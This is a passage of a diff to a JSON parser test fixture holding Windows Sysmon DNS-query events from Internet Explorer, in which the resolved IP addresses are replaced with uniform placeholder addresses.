03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7199,7 +7199,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;", + "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.620", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7222,7 +7222,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7244,7 +7244,7 @@ "event_data": { "QueryName": "ul1.dvtps.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.811", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7305,7 +7305,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7322,7 +7322,7 @@ "ProcessId": "2736", "QueryName": "tags.bluekai.com", "QueryStatus": "0", - "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;", + "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -7350,7 +7350,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "channel": "Microsoft-Windows-Sysmon/Operational", @@ -7362,7 +7362,7 @@ "ProcessId": "2736", "QueryName": "cdnjs.cloudflare.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, @@ -7389,7 +7389,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7404,7 +7404,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.051", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7445,7 +7445,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.054", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7461,7 +7461,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7495,7 +7495,7 @@ "ProcessId": "2736", "QueryName": "ocsp.trust-provider.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" } }, @@ -7503,7 +7503,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 